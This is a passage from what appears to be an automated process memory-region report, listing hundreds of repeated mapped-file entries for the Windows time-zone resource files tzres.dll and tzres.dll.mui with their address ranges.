filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3320
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3321
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3322
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3323
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3324
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3325
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3326
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3327
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3328
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3329
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3330
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3331
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3332
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3333
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3334
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3335
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3336
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3337
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3338
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3339
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3340
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3341
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3342
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3343
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3344
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3345
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3346
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3347
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3348
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3349
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3354
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3355
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3356
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3357
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3358
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3359
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3360
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3361
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3362
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3363
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3364
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3365
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3366
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3367
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3368
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3369
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3370
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3371
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3372
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3373
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3374
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3375
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3376
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3377
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3378
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3379
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3380
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3381
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3382
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3383
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3384
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3385
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3386
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3387
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3388
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3389
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3392
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3393
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3394
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3395
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3396
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3397
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3398
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3399
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3400
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3401
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3402
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3403
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3404
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3405
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3406
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3407
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3408
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3409
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3410
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3411
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3412
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3413
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3414
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3415
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3416
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3417
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3418
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3419
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3420
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3421
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3422
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3423
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3424
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3425
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3426
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3427
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3428
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3429
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3430
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3431
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3432
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3433
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3434
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3435
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3436
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3437
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3438
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3439
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3440
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3441
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
